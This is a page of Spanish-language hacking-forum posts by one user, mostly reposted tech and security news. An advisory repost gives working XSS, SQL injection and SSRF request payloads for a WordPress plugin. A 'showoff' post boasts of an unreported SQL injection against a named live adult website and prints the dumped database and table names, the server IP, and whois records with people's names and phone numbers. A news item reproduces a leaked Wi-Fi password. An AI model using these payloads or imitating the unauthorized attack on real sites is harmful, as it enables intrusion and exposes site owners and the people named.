Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Mayk0

Páginas 1 ... 3 4 5 6 7

#81

Bugs y Exploits / WordPress Bulletproof-Security .51 Multiple Vulnerabilities

Noviembre 07, 2014, 01:54:49 PM

WordPress Bulletproof-Security .51 Multiple Vulnerabilities
Fecha    2014-11-06
Categoria    web applications
Platforma    php

CVE    CVE-2014-7958,
CVE-2014-7959,
CVE-2014-8749
=========================
Descripcion:
WordPress Bulletproof-Security version .51 suffers from SSRF, cross site scripting, and remote SQL injection vulnerabilities.
=========================

Vulnerability title: Wordpress bulletproof-security <=.51 multiple
vulnerabilities
Author: Pietro Oliva
CVE: CVE-2014-7958, CVE-2014-7959, CVE-2014-8749
Vendor: AITpro
Product: bulletproof-security
Affected version: bulletproof-security <= .51
Vulnerabilities fixed in version: .51.1

Details:

xss vulnerability (CVE-2014-7958):

POST /wp-content/plugins/bulletproof-security/admin/htaccess/bpsunlock.php
HTTP/1.1

dbname=&dbuser=&dbpassword=&dbhost=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&tableprefix=&username=&Login-Security-Unlock=Unlock+User+Account

SQL injection vulnerability (CVE-2014-7959, correct db username and
password is required in order to exploit this):

POST /wordpress/wp-content/plugins/bulletproof-security/admin/htaccess/bpsunlock.php
HTTP/1.1

dbname=information_schema&dbuser=root&dbpassword=password&dbhost=&tableprefix=tables+into+outfile+'/tmp/tables'%3b+--+&username=&Login-Security-Unlock=Unlock+User+Account

SSRF vulnerability (CVE-2014-8749)

POST /wp-content/plugins/bulletproof-security/admin/htaccess/bpsunlock.php
HTTP/1.1
dbname=&dbuser=root&dbpassword&dbhost=remotedatabase.com&tableprefix=&username=&Login-Security-Unlock=Unlock+User+Account

Possible scenario:

- the user sends a request with username, password, host and other
parameters to the vulnerable page
- the server doesn't check the host parameter to be in a whitelist of
permitted databases
- the server performs an authentication request to a remote or
internal network database and gives back to the attacker the
authentication result
-After n attemps the attacker has bypassed access restrictions (if
any) to the remote database, discovered the remote database password,
and made it appear bulletproof-security as the source of the attack.

Extra step:
-If the sql injection flaw (CVE-2014-7959) is not fixed, an attacker
could also execute arbitrary sql statement on the remote server, as
the vulnerable page executes a query if the authentication is
successful (without filtering or use prepared statements). The source
of the attack would appear to be the bulletproof-security vulnerable
site.

#82

Noticias Informáticas / 19 detenidos por apología del terrorismo en las redes sociales

Noviembre 07, 2014, 01:49:31 PM

Los arrestados están acusados de lanzar insultos contra Miguel Ángel Blanco
También escribieron mensajes que piden que se coloquen "bombas lapa" a varios políticos
La Guardia Civil busca a 200 personas que enaltecen a ETA en redes sociales

La Guardia Civil ha detenido a 19 personas, tres de ellas menores de edad, y ha imputado a otras dos, ambas de 14 años, por apología del terrorismo en las redes sociales. Los detenidos están acusados de insultar a las víctimas del terrorismo en las redes sociales, la mayoría a través de mensajes en Twitter. La Guardia Civil aborda con esta actuación la segunda fase de la Operación Araña contra personas que lanzan mensajes ofensivos contra las víctimas del terrorismo en Internet.

La Guardia Civil detectó en los últimos meses "un destacado número de perfiles" en redes sociales que difundían "de manera continuada numeroso contenido apologético de ETA" y otras organizaciones terroristas como Al Quaeda y Grapo, además de "contenidos que humillan directamente a las víctimas", detalla el Ministerio del Interior en una nota. Los mensajes también alientan a que se comentan atentados y hacen referencias "humillantes" a daños físicos sufridos por las víctimas, asegura Interior.

Las detenciones se han producido de momento en Álava, Vizcaya, Navarra, Madrid, Barcelona, Toledo y en León. Los arrestados tienen entre 19 y 62 años de edad.

La Guardia Civil prevé tomarles manifestación y dejarles después en libertad a la espera de que declaren en la Audiencia Nacional. A los arrestados también se les incauta el dispositivo móvil desde el que supuestamente han enviado los mensajes. La operación está dirigida por el juez Central de Instrucción número 3 de la Audiencia Nacional, Javier Gómez Bermúdez.

Entre las frases escritas en Internet que han motivado la segunda fase de la Operación Araña se encuentran comentarios en los que se insulta al concejal asesinado por ETA Miguel Ángel Blanco y se piden "bombas lapa" contra políticos como Rajoy, Rubalcaba o Esperanza Aguirre, han informado fuentes de la investigación.

El pasado abril, las fuerzas de seguridad ya detuvieron a una veintena de personas por enaltecimiento del terrorismo. Quedaron en libertad con cargos tras declarar ante la Justicia. La mayoría sigue a la espera de juicio, pero una parte ha aceptado condenas de hasta un año de cárcel.

Algunos de los comentarios y referencias en las redes sociales como Twitter y Facebook lanzados por los detenidos de forma reiterada, en perfiles públicos y con numerosos seguidores adheridos expresaban el deseo de que organizaciones terroristas aún activas sigan cometiendo atentados. Las fuerzas de seguridad explicaron entonces que los detenidos, que no tenían relación entre sí y actuaban de manera individual, insultaban a las víctimas de atentados terroristas con comentarios ofensivos en redes sociales como Twitter o Facebook y animaban a organizaciones terroristas a la comisión de atentados.

A raíz del asesinato de la presidenta de la Diputación de León Isabel Carrasco también se produjeron varias detenciones por llamamientos en las redes a matar a políticos.

Fuente: politica.elpais

#83

Noticias Informáticas / Android 5.0 se retrasa por fallo de última hora

Noviembre 07, 2014, 01:48:06 PM

Como indica el título Android 5.0 se retrasa, y lo hace por culpa de un fallo de última hora que afortunadamente ya está resuelto, pero que como decimos ha forzado a Google a retrasar su lanzamiento.

Inicialmente la llegada de la nueva versión del pequeño androide a la gama Nexus estaba prevista para el pasado tres de noviembre, pero finalmente los poseedores de un dispositivo Nexus de Google tendrán que esperar al 12 de este mes.

Volviendo al fallo en concreto parece que estaba relacionado con la conectividad WiFi que provocaba picos muy grandes de uso de la batería, unos picos que rondaban entre el 60% y el 70% de consumo, pero que en algunos casos alcanzaban incluso el 100%.

En un primer momento parecía que la cosa iba podría ir para largo de cara a la resolución del citado error pero finalmente el problema ha sido marcado como resuelto en apenas unos días, aunque de momento no se ha publicado información concreta sobre el mismo por lo que no podemos dar más detalles al respecto.

Sí todo va bien y no hay sorpresas desagradables de última hora Android 5.0 Lollipop debería estar disponible a partir del próximo 12 de noviembre en la gama Nexus de Google.

Fuente: mycomputer

#84

Noticias Informáticas / La Guardia Civil y Disney se alían en la protección del menor en Internet

Noviembre 07, 2014, 01:47:05 PM

El Club Penguin y los Vengadores de Marvel advierten a los más pequeños de los peligros en la red

El director general de la Guardia Civil, Arsenio Fernández de Mesa, y el consejero delegado de The Walt Disney Company Iberia S.L., Simon Amselem, firmaron ayer en Madrid un acuerdo de colaboración con el objetivo de contribuir en la protección de los menores en el uso de Internet.

Amselem explicó que mediante la plataforma 'Club Penguin' los niños "pueden jugar, navegar y aprender" de forma segura y con la ayuda de la Guardia Civil se reforzará la seguridad y la protección del menor ante los riesgos en la Red.

El director general de la Guardia Civil se mimetizó con los niños, y en un lenguaje sencillo respondió a todas las preguntas espontáneas que les iban surgiendo a los 40 niños de edades comprendidas entre 8 y 9 años presentes en el acto mientras firmaba el convenio de colaboración con Disney.

Fernández de Mesa les explicó que el uso de Internet por "motiva a la formación sobre el uso de las nuevas tecnologías de la información y de la comunicación", aunque también "hay que tener en cuenta los riesgos" que hay en la Red. Para prevenir estos riesgos y reaccionar ante ellos, el director general de la Guardia Civil explicó que este cuerpo lleva impartiendo desde hace seis meses más de 8.000 charlas y conferencias informativas en unos 6.600 colegios de toda España, con el fin de "sensibilizar y concienciar" a los menores.

Los dibujos online del Club Penguin para los niños de tercero y cuarto de Primaria y de los Vengadores de Marvel como el Capitán América o Hulk para los de 12 años serán los que conecten con los niños y alerten de lso peligros en la red.

Hoy han sido los guardias civiles Mercedes y Carlos quienes instruyeron mediante preguntas fáciles a los niños, con la ayuda virtual de los pingüinos de Disney, que hasta que no cumplan 14 años no pueden tener cuentas en redes sociales ni tampoco darse de alta en ninguna web. La mayoría cumple.

"A mí mi madre no me deja", exclaman varias niñas a la vez, pero un niño con gafas confiesa que se hizo una cuenta en Facebook y dijo que tenía 40 años. Tras las risas de los compañeros la Guardia Civil recuerda: "Si sois capaces de mentir en internet, también os pueden engañar a vosotros. Yo puede decir que tengo 14 años" y "tampoco os creáis que tienen 12 años por la foto, ya que pueden cogerla de cualquier sitio".

Mientras, los Pengüin les lanzan más mensajes: está prohibido leer el correo electrónico de otros, insultar o amenazar porque lo que tienen que tener claro, les dicen los agentes, es que no deben "hacer nada que no les gustaría que les hicieran a ellos". "Eso nos lo dice la profe", repiten a coro varios niños. Además, insistieron en que sean listos, que pongan contraseñas "difíciles", que no faciliten nunca dónde viven, ni siquiera cuántos hermanos tienen, porque cualquier información personal puede usarla alguien para hacer daño a su familia.

Mercedes les contó cómo investigando el robo de una casa descubrieron que los ladrones sabían lo que había, las medidas de seguridad y los días que estaría vacía porque el hijo de la familia se lo contaba a un desconocido de Facebook y se paseaba por toda la casa con la webcam encendida. Por ello, recordó a los niños que tapen las cámaras web con una tirita o cinta aislante para que así, si la activa alguien a través de control remoto, no se pueda ver nada. Entre las preguntas de los guardias civiles estaba ¿cuántos amigos teneis? "Una, mi mejor amiga" "yo tengo catorce", presumía otro niño. Pero, "¿conocéis el nombre y apellido de todos los que están en vuestro cole?" Ante la respuesta negativa de los niños, les recordaron que "nadie es más guay por tener 700 amigos en una red social" y además, esos amigos no son "amigos" porque a muchos no se les conoce.

Por tanto les recordó que no revelen información de ellos, ni teléfonos, ni nada de ellos. Una hora de clase práctica que los Guardias Civiles seguirán impartiendo en los colegios. Dos consejos últimos: uno que estudien, que es lo primero, y segundo, que si no le quieren contar las cosas a los padres se las confién a un hermano mayor, a un profesor, a alguien mayor y que "siempre, siempre la Guardia Civil está ahí" para ayudarles.

Como dijo el director general de la Guardia Civil a los niños: "los que van de verde son una policía que vela y guarda a todos los españoles por su seguridad" y les dijo a los niños que "es más fácil que todo esto os lo cuente Mickie Mouse porque le vais a hacer más caso". "Siiii", repitieron los niños a coro. Aunque, uno puntualizó a Fernández de Mesa que "los dibujos de Mickey Mouse de su época no son como los de ahora. "Tú veías a Mickie en blanco y negro".

Fuente: larazon

#85

Noticias Informáticas / Windows 10 también recibirá parches de seguridad

Noviembre 07, 2014, 01:44:54 PM

Microsoft ha anunciado 16 parches de seguridad para Windows y Office que publicará el próximo martes en su boletín de seguridad mensual correspondiente a noviembre.

Martes de parches típico que incluye la novedad de incluir actualizaciones de seguridad para Windows 10, lo que indica que trata el sistema como las versiones estables de Vista, 7 y 8 que todavía soporta.

Los parches para Windows 10 serán cuatro y se recibirán de la misma manera que el resto, a través de Windows Update en la Technical Preview que están probando más de un millón de usuarios.

Esta versión de testeo ha sido actualizada en un par de ocasiones y se espera que además de los parches de seguridad reciba un nuevo paquete de mejoras muy pronto que incluiría un centro de notificaciones remozado, nuevo panel de control o el anunciado soporte para formatos MKV y HEVC.

Si se cumple el calendario de desarrollo previsto, Microsoft publicaría una beta pública de Windows 10 a comienzos de 2015 y tendría lista la RTM para presentarla en la BUILD 2015, en primavera. La versión final comercial y retail sería publicada en el verano de 2015.

Fuente: mycomputer

#86

Noticias Informáticas / Roban 53 millones de emails de Home Depot

Noviembre 07, 2014, 01:44:07 PM

Una investigación del 'hackeo' a Home Depot de este año desveló que no sólo robaron números de tarjetas de crédito, sino también millones de cuentas de correo electrónico.

Junto con unos 56 millones de números de tarjetas de crédito robados de Home Depot este año, los investigadores del caso dijeron el jueves que más de 53 millones de correos electrónicos fueron robados, también.

Una investigación conjunta de fuerzas policíacas, representantes de Home Depot y analistas de seguridad independientes descubrió que no hubo "contraseñas, información de pagos con tarjeta u otra información sensible" dentro de los archivos robados que contenían las direcciones de correo de los clientes.

El informe de la investigación detalla cómo ocurrió el hackeo. Parecido al ataque contra Target del año pasado, los atacantes usaron las credenciales de acceso de un proveedor externo de Home Depot para acceder a la red interna de la compañía e instalar el software malicioso en las registradoras de autoservicio.

El software malicioso, que estuvo activo en la red de Home Depot entre abril y septiembre de este año, ya ha sido removido. Cuando el hackeo se hizo público, Home Depot dijo que añadió más encriptación a sus sistemas de pagos con tarjeta de crédito.

La empresa ha notificado a los dueños estadounidenses y canadienses de las direcciones de email, aunque no estaba forzada por la ley para hacerlo. Home Depot dijo que emitió una alerta con la esperanza de evitar que sus clientes sean víctimas de ataques tipo phishing, una práctica común con las direcciones de correo electrónico robadas.

Home Depot dijo que no espera dar más información sobre el ataque. Una solicitud para obtener más información no ha sido respondida.

El ataque es uno de varios ataques contra importantes minoristas y cadenas de restaurantes en Estados Unidos en fechas recientes. El año pasado, los hackers detrás del ataque contra Target robaron unos 40 millones de números de tarjetas de crédito e información personal de 70 millones de personas. Las tiendas de manualidades Michaels Stores, la tienda departamental Neiman Marcus y la cadena de restaurantes P.F. Chang's dijeron que también habían sido atacados por hackers que buscaban hacerse de la información de las tarjetas de crédito de sus clientes.

Fuente: cnet

#87

Noticias Informáticas / La palabra gratis es muy importante en Microsoft

Noviembre 07, 2014, 01:42:20 PM

Es evidente que en Microsoft las cosas han cambiado mucho durante los últimos años, tanto que el gigante de Redmond se ha convertido en algo muy diferente de lo que era hace apenas diez años.

A pesar de todos estos cambios la compañía ha llegado tarde en más de una ocasión, algo que se hace especialmente visible al echar un vistazo al sector móvil, pero poco a poco el gigante del software está adaptando su estrategia de una forma que no nos habríamos atrevido a pensar en un primer momento, y en la que la palabra gratis tiene un importante valor.

En este sentido podemos destacar que ofrecer un servicio de calidad como por ejemplo Office Mobile de forma gratuita es una forma de mejorar tu cuota de usuarios y contribuye a incrementar tu presencia en el sector smartphone, probablemente el más concurrido y competitivo que existe a día de hoy.

Pero no, esto no es todo, como decimos en Microsoft lo gratis empieza a jugar a lo grande y se extiende también a Windows 8.1 para tablets de menos de 9 pulgadas, una variante de su sistema operativo que se dio a conocer como Windows 8.1 with Bing y que presenta un coste cero para los OEMs.

Gracias a esta estrategia ha sido posible la llegada de tablets con SoCs Atom y Windows 8.1 totalmente funcionales y muy capaces pero con precios irrisorios, tanto que llegan incluso a colocarse por debajo de los 100 dólares.

Otro de los productos de Microsoft que se ha sumado a la fiebre de lo gratis ha sido Skype, ofreciendo servicios como videollamadas en grupo sin coste tanto en PC como en Mac OS X y Xbox One, pero el auténtico gran paso que podría dar el gigante de Redmond dentro de su oferta de productos gratis sería Windows 10.

Se ha hablado mucho sobre ello, pero los rumores todavía no se han callado y apuntan a que Windows 10 podría ser totalmente gratis para usuarios de Windows 8.1 y quizá también los de Windows 7, algo que, de confirmarse, podría facilitar mucho las cosas a Microsoft de cara a acelerar la transición a su próximo sistema operativo.

Tras este pequeño resumen no hay duda, lo gratis ha llegado con fuerza a Microsoft y parece que lo ha hecho para quedarse y convertirse en un pilar básico de la nueva estrategia del gigante de Redmond. Ahora sólo queda esperar a ver qué hacen con el verdadero plato fuerte, Windows 10.

Mas información: Neowin / Fuente: muycomputer

#88

Noticias Informáticas / Equipo Mundial de Seguridad de la Copa FIFA accidentalmente revela su conexión..

Junio 29, 2014, 05:20:15 PM

Equipo Mundial de Seguridad de la Copa FIFA accidentalmente revela su conexión Wi-Fi Contraseña

Esta Copa Mundial de la FIFA, la seguridad ha sido muy bien y todavía ningún incidente calamitosa reportado hasta el momento, que no sea la empresa de seguridad que se encarga de mantener un ojo en la seguridad del evento, la propia Twitter una fotografía de su estado-of-the- centro de monitoreo de arte que expone interna contraseña Wi-Fi del centro de seguridad de la Copa del Mundo a todo el mundo.

Empresa de seguridad con sede en Israel RISCO está proporcionando la gestión de la seguridad en el estadio de fútbol y muy orgullosos de su increíble trabajo en la obtención de la Copa Mundial de este año, que incluye el seguimiento y el mantenimiento de cientos de cámaras de seguridad de circuito cerrado de televisión en todo el Arena Pantanal estadio de fútbol de 41.000 asientos en Cuiaba , Brasil.

La imagen fue publicada originalmente por medio de comunicación Correio Braziliense, que mostraba la cabeza de la cooperación internacional de la policía federal Luiz Cravo Dorea , de pie en el centro de seguridad de mulch millones de dólares supervisado por la compañía israelí RISCO y estaba viendo video en vivo desde cámaras de vigilancia .

La imagen fue publicada el Twitter y ha sido re-tweeted casi 3.000 veces.

El centro de seguridad de la Copa del Mundo le permite al personal de seguridad para ver imágenes en directo desde varias cámaras alrededor de los estadios de la Copa Mundial. Pero, inadvertidamente expuesta Wi-Fi SSID y la contraseña en el fondo de la foto en la pantalla grande que cualquiera puede leer con un estrabismo del ojo. Dice lo siguiente:

Wifi Red: worldcup Contraseña: b5a2112014

adivinar y la más segura para este evento de la Copa Mundial de la altamente considerado. Haaa!

Este filtradas accidentalmente Wi-Fi Credenciales del Centro de Seguridad del partido más importante en la Tierra podrían haber dado cibercriminales oportunidad de llevar a cabo ataques man-in-the-middle de entrar en su red y comprometer los sistemas.

Pero, sin duda después de las actualizaciones de los medios, se habrían dado cuenta de su error y actualizó el SSID WiFi y una contraseña para el centro de la seguridad del fútbol de la Copa del Mundo en secreto.

Fuente: The hacker new.

#89

Noticias Informáticas / Zero-Day TimThumb WebShot Vulnerabilidad deja miles de blogs de Wordpress..

Junio 29, 2014, 05:19:10 PM

Zero-Day TimThumb WebShot Vulnerabilidad deja miles de blogs de Wordpress en Riesgo

Ayer nos enteramos de una vulnerabilidad crítica de día cero en una biblioteca de imágenes cambiar el tamaño popular llamado TimThumb, que se utiliza en miles de WordPress temas y plugins.

WordPress es una herramienta de blogging gratuito y de código abierto y un sistema de gestión de contenidos (CMS), con más de 30.000 plugins, cada uno de los cuales ofrece funciones personalizadas y características permiten a los usuarios adaptar sus sitios a sus necesidades específicas, por lo que es fácil de configurar y usar , es por eso que decenas de millones de sitios web en todo el mundo optan por ella.

Pero si usted o su empresa es la que utiliza la biblioteca de cambio de tamaño de imagen popular llamado " TimThumb "para cambiar el tamaño de imágenes de gran tamaño en las miniaturas utilizables que se pueden mostrar en su sitio, entonces usted, asegúrese de actualizar el archivo con la próxima versión más reciente y no olvide comprobar el sitio TimThumb regularmente para la actualización parcheado.

0-Day ejecución remota de código y SIN PARCHE
La vulnerabilidad crítica descubierta por Pichaya Morimoto en el plugin versión TimThumb Wordpress 2.8.13, reside en su " Webshot característica "que, cuando está activado, permite a los atacantes ejecutar comandos en un sitio web remoto.

La vulnerabilidad permite a un atacante ejecutar código PHP arbitrario de forma remota en el sitio web afectado. Una vez que se ha ejecutado el código PHP, el sitio web puede ser fácilmente comprometida en la forma en que el atacante quiere. Hasta ahora, no hay parche disponible para la falla.

" Con un simple comando, un atacante puede crear, eliminar y modificar los archivos de su servidor ", dice Los expertos en seguridad a la rotura Sucuri en una entrada de blog .

Usando el siguiente comando, un hacker puede crear, eliminar y modificar los archivos en su servidor:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Que son vulnerables
Por desgracia, hay cientos de otros plugins y temas de Wordpress, los están utilizando la biblioteca TimThumb por defecto. Algunos de tema son:

1.) TimThumb 02/08/13 Wordpress Plugin
1.) WordThumb 1.07 también está utilizando el mismo código WebShot vulnerable.
2.) Wordpress Plugin Galería
3.) IGIT Mensajes deslizante Widget

4.) Todos los temas de Wordpress desde Themify contiene wordthumb vulnerable en "/ Themify / img.php ubicación ".

La buena noticia es que Timthumb viene con la opción webshot desactivado por defecto, por lo que sólo aquellas instalaciones TimThumb son vulnerables a la falla que han permitido esta función manualmente webshot.

COMPROBAR Y DESACTIVAR TimThumb "Webshot"

Archivo timthumb abierto dentro de su tema o directorio de plugins, que normalmente se encuentra en "/ Wp-content/themes // Ruta / al / timthumb.php "
Búsqueda de " WEBSHOT_ENABLED "
Si la encuentras define ('WEBSHOT_ENABLED', true) , a continuación, establezca el valor " falso", es decir, define ('WEBSHOT_ENABLED', false)

Desafortunadamente, múltiples fallos de seguridad similares fueron descubiertos en TimThumb en el pasado, dejando a millones de sitios web de WordPress powered vulnerable al ataque.

Fuente: The hacker new.

#90

Noticias Informáticas / Kim Dotcom ofrece varios millones de dólares a informadores del Gobierno

Junio 10, 2014, 01:14:50 PM

El fundador del cerrado portal Megaupload, Kim Dotcom, ofrece 5.000.000 de dólares a aquellos informadores que consigan proporcionarle pruebas de que el cierre de su página web, así como su posterior acoso judicial, se hizo de manera ilegal.
"Mi caso es injusto. Se me denegó el descubrimiento. No se me devolvieron mis propios datos. Necesito informadores. Ofrezco 5 millones de dólares", escribió Dotcom a través de su cuenta de Twitter.

Dotcom, que reside en Nueva Zelanda a la espera de que se cumpla una orden de extradición a EE.UU. el próximo 7 de julio, busca concretamente "cualquier tipo de información que pruebe una conducta corrupta o ilegal por parte del Gobierno estadounidense, neozelandés, agencias de espionaje y Hollywood", declaró el informático al portal 'TorrentFreak'.

Según Kim Dotcom, las acciones legales tomadas en su contra y Megaupload fueron una "persecución corrupta" orquestada por la Casa Blanca para mantener el apoyo de Hollywood en la campaña de reelección de Barack Obama como presidente de EE.UU.

"Sabemos que ahí fuera hay gente con información. Estoy dispuesto a pagar por esa información. Tengo la determinación de luchar contra la grave injusticia que se ha cometido contra un negocio de almacenamiento en la nube legítimo. La batalla acaba de comenzar y tardará su tiempo. Pero al final, saldremos victoriosos y destaparemos a quienes hayan abusado de su poder", concluyó.

Como posible vía para poder informar a Dotcom en caso de que se tengan pruebas que demuestren la ilegalidad de su caso, el fundador de Mega recomienda utilizar una herramienta del diario británico 'The Guardian'. Sin embargo, sugiere a los

Fuente: RT Actualidad

#91

Noticias Informáticas / Prisión para el 'hacker' que filtró desnudos de George W. Bush

Junio 10, 2014, 01:11:51 PM

La justicia de Rumanía condenó el viernes a cuatro años de cárcel a Marcel Lazar Lehel, un 'hacker' más conocido como 'Guccifer' que se hizo famoso tras colgar en la Red los autorretratos al desnudo que pintó el expresidente de EE.UU. George W. Bush
El acusado, de 42 años de edad, tendrá que pagar también una multa de 11.000 leus rumanos (unos 3.400 dólares); además, se le confiscará el ordenador portátil. Se informa que las agencias de seguridad de EE.UU., entre ellas el FBI, estaban investigando a Lehel desde hace más de un año, pero la Corte rumana no comenta si Washington ha solicitado su extradición, según detalla el diario británico 'The Guardian'.

Guccifer irrumpió en 2013 en las cuentas de correo electrónico de la familia Bush y robó fotos privadas, incluidas imágenes del exmandatario estadounidense en el hospital, fotos de obras de arte y correspondencia, además de autorretratos en los que George W. Bush se pintó desnudo en la ducha y en el baño. También obtuvo acceso a la lista confidencial de direcciones, teléfonos y direcciones de correos electrónicos de la dinastía Bush.

El 'hacker' pirateó también la correspondencia de los exsecretarios de Estado de EE.UU. Colin Powell y Hillary Clinton, y del director de los servicios secretos de Rumanía, George Maior, así como de numerosos diplomáticos, financistas y militares rumanos.

Fuente: RT Actualidad

#92

Hacking ShowOff / Re:[SQL Injection] http://www.rubias19.com/

Mayo 10, 2014, 12:24:32 AM

Jjaja See es viejo el fallo ese, Igual Ya publicaré mas fallos, No estoy reportandolos ni nada, Solo los enseño...

De por sí no me interesa mucho la seguridad de una Página porno Jjaja

Peero bueno ya me voy a poner en contacto con los Administradores y Ver si me hacen caso.

#93

Hacking ShowOff / [SQL Injection] http://www.rubias19.com/

Mayo 09, 2014, 07:55:11 PM

Asi, se jode a un Administrador De una Pagina Porno Basicamente. Vale aclarar, que el fallo no fue reportado.

Analyzing You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login with 1 input parameter(s)
Test parameter: id
Host IP: 109.205.138.21
Web Server: nginx
Powered-by: PHP/5.2.17
Keyword Found: NUEVA
Injection type is Integer
DB Server: MySQL >=5
Selected Column Count is 5
Valid String Column is 2
Current DB: rubias19
Sql Version:    5.1.73-log
Current User:    rubias19@localhost
System User:    rubias19@localhost
Installation dir:    /usr/
Host Name:    You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Current DB:    rubias19
Compile OS:    redhat-linux-gnu
Db user: 'rubias19'@'localhost'
Data Base Found: information_schema
Data Base Found: rubias19
Data Base Found: rubias19_clon
Data Base Found: tube_rubias19
Data Base Found: tube_rubias19_clon
Data Base Found: information_schema

Count(table_name) of information_schema.tables where table_schema=0x7275626961733139 is 24
Tables found: _ActricesVideos,
actrices,
contenidos_relacionados,
cumlouders_propios,
especiales,
fotospornogratis,
galerias_chicas,
galerias_propias,
ids_chicas,
ips,
noticiario_backup,
noticias,
noticias_backup,
palabras,
peliculas2,
rel_noticia_actriz,
rel_noticia_productora,
rel_noticia_tag,
tag,
tag_actriz,
tag_productora,
videos_embed,
videos_schat,
videospornogratis

Count(table_name) of information_schema.tables where table_schema=0x747562655F7275626961733139 is 8
Tables found: register_login,
tag,
tag_type,
tube_params,
users,
video,
video_images,
video_tag

=================================

IPv4

General information 109.205.138.21

IP address   109.205.138.21
Description   Hosting Rapido Madrid
Location   Spain (ES) flag
Internet Registry (RIR)   ripe

Network information
IP address   109.205.138.21
Reverse DNS (PTR record)   You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
DNS server (NS record)   You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login (198.211.110.122)
ns2.hostingrapido.com (78.47.170.107)
ns3.hostingrapido.com (144.76.52.86)
ASN number   196929
ASN name (ISP)   OZONTI-NETWORK Somos Centro de Datos S.L.,ES
IP-range/subnet   109.205.138.0/24
109.205.138.0 - 109.205.138.255
Network tools   external website Ping 109.205.138.21
external website Traceroute 109.205.138.21

Hosting information
Number of domains hosted   6
Number of mail servers hosted   5
Number of name servers hosted   0

SPAM database lookup
db.wpbl.info   not listed good
dnsbl-1.uceprotect.net   not listed good
psbl.surriel.com   not listed good
recent.dnsbl.sorbs.net   not listed good
smtp.dnsbl.sorbs.net   not listed good
Number of SPAM hosts on 109.205.138.0/24   0
external website More DNSBL lookups

Blocklist lookup
Adult hosting   listed error
Dshield droplist   not listed good
Hackers, Spyware, Botnets etc.   not listed good
Open proxy   not listed good
Spamhaus droplist   not listed good

Domains on 109.205.138.21
rubias19.com analyse rubias19.comdomain info
ofertas.com analyse ofertas.comdomain info
conejox.com analyse conejox.comdomain info
conigliox.com analyse conigliox.comdomain info
taxi69.com analyse taxi69.comdomain info
premium-ns.com analyse premium-ns.comdomain info
domain neighbors 109.205.138.21Fresh lookup for more domains on this IP.

Domains around 109.205.138.21
IP address   Number of domains
109.205.137.203   16
109.205.137.204   2
109.205.137.205   6
109.205.137.206   1
109.205.137.210   6
109.205.137.211   1
109.205.137.213   21
109.205.137.214   65
109.205.137.215   28
109.205.137.216   2
109.205.137.217   1
109.205.137.219   54
109.205.137.220   26
109.205.137.226   23
109.205.137.228   82
external websiteSee more items

Mail servers on 109.205.138.21
rubias19.com
conejox.com
taxi69.com
conigliox.com
premium-ns.com
Name servers on 109.205.138.21
No name servers found.

Whois information
inetnum   109.205.138.0 - 109.205.138.255
netname   HostingRapido-Network
descr   Hosting Rapido Madrid
country   ES
admin-c   FJML11-RIPE
tech-c   FJML11-RIPE
status   ASSIGNED PA
mnt-by   MNT-GESTIONCLIENTES
mnt-lower   MNT-GESTIONCLIENTES
mnt-routes   MNT-GESTIONCLIENTES
source   RIPE # Filtered
person   Francisco Jose Mangas Lopez
address   Cl Jeronimo Arroyo, 13
phone   +34617056302
nic-hdl   FJML11-RIPE
source   RIPE # Filtered
route   109.205.138.0/24
descr   Hosting Rapido Network
origin   AS196929
mnt-by   MNT-GESTIONCLIENTES
source   RIPE # Filtered

Parant whois information
inetnum   109.205.136.0 - 109.205.143.255
netname   ES-GESTIONCLIENTES-20100212
descr   Somos Centro de Datos S.L.
country   ES
org   ORG-PAJL1-RIPE
admin-c   DPG4-RIPE
tech-c   DPG4-RIPE
status   ALLOCATED PA
mnt-by   RIPE-NCC-HM-MNT
mnt-lower   MNT-GESTIONCLIENTES
mnt-routes   MNT-GESTIONCLIENTES
source   RIPE # Filtered
organisation   ORG-PAJL1-RIPE
org-name   Somos Centro de Datos S.L.
org-type   LIR
address   Somos Centro de Datos S.L.
address   Daniel Perez
address   C/ Sevilla P16 i
address   34004
address   Palencia
address   SPAIN
phone   +34979726800
fax-no   +34979756800
abuse-c   AR14923-RIPE
mnt-ref   MNT-OZONTI
mnt-ref   RIPE-NCC-HM-MNT
mnt-by   RIPE-NCC-HM-MNT
admin-c   DPG4-RIPE
abuse-mailbox   You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
source   RIPE # Filtered
person   Daniel Perez Gutierrez
address   Cl Sevilla 16i
phone   +34 979 727 624
nic-hdl   DPG4-RIPE
mnt-by   mnt-ozonti
source   RIPE # Filtered
route   109.205.137.0/24
descr   Customer Network
origin   AS196929
mnt-by   MNT-GESTIONCLIENTES
source   RIPE # Filtered

=================================

ISP

General information
AS number   196929
Alias   AS196929, ASN196929
Organization   OZONTI-NETWORK Somos Centro de Datos S.L.,ES
Country   Spain (ES) flag
Regional Internet Registry (RIR)   ripe
Allocation or assignment date   2010-02-12
Number of IPs originated (v4)   3,072
ASRank (based on number of IPs)   17,733
Number of active prefixes (ipv4)   6
Number of active prefixes (ipv6)   0
AS has bogon prefixes   No
Number of BGP peers detected (ipv4)   1
Number of BGP peers detected (ipv6)   0

Hosting information
Number of domains hosted   3,671
Number of adult domains hosted   40
Number of name servers hosted   216
Number of SPAM hosts hosted   10
Number of open proxies hosted   0
Number of malicious threats hosted   6
Number of mail servers hosted   154

Prefixes IPv4
Prefix   Description
109.205.136.0/24 (ES flag)   Cloud Network 1
109.205.137.0/24 (ES flag)   Somos Centro de Datos S.L.
109.205.138.0/24 (ES flag)   Hosting Rapido Madrid
109.205.139.0/24 (ES flag)   Somos Centro de Datos S.L.
109.205.140.0/22 (ES flag)   Cloud Network 2
185.25.196.0/22 (ES flag)   Somos Centro de Datos S.L.

Prefixes IPv6
No IPv6 prefixes defined. AS196929 is not IPv6 ready.
Advertisements
HideMyAss.com

Domains hosted on as196929
Domain   IPv4 Address
grupocfi.es   109.205.136.11
aulateleformacion.com   109.205.136.11
lopdmanager.es   109.205.136.11
